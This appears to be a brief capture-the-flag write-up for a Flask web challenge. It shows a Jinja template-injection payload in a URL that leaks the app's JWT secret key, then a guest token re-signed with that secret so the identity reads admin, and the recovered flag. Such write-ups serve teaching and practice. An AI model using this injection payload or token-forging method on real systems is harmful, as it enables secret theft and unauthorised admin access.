if we login as guest , we'll got a jwt token  
```  
"eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJpYXQiOjE1ODQ2MzE1MzksIm5iZiI6MTU4NDYzMTUzOSwianRpIjoiMTVlYjM3NGQtNjM2MS00YTViLWJkOWMtYWRlMTA1NGRhMWJmIiwiaWRlbnRpdHkiOiJndWVzdCIsImZyZXNoIjpmYWxzZSwidHlwZSI6ImFjY2VzcyJ9.uL2EnxrI-
nmAivK526z1WW5pYCbuM1m0DnSt80Ua8t8"  
```  
also we can find jwt secret key with jinja ssti payload:  
```  
http://66.172.11.208:5000/{{config.get('JWT_SECRET_KEY')}}  
this_is_a_$uper_secure_key  
```  
now we can decode/encode token with https://github.com/noraj/flask-session-
cookie-manager or https://www.jsonwebtoken.io/ and secret:  
```  
{  
"iat": 1584631539,  
"nbf": 1584631539,  
"jti": "15eb374d-6361-4a5b-bd9c-ade1054da1bf",  
"identity": "guest",  
"fresh": false,  
"type": "access",  
"exp": 1584636088  
}  
```  
so we should change ```guest``` to ```admin```  
```  
eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJpYXQiOjE1ODQ2MzE1MzksIm5iZiI6MTU4NDYzMTUzOSwianRpIjoiMTVlYjM3NGQtNjM2MS00YTViLWJkOWMtYWRlMTA1NGRhMWJmIiwiaWRlbnRpdHkiOiJhZG1pbiIsImZyZXNoIjpmYWxzZSwidHlwZSI6ImFjY2VzcyIsImV4cCI6MTU4NDYzNjI2MH0.oxecwSBNV1ForC6hwNTZTkLQUvDL1odm2z1dcfNdc0E  
```  
then request flag with this token  
```  
SUSEC{server_$ide_R3ND3R!NG_is_a_bad_idea}  
```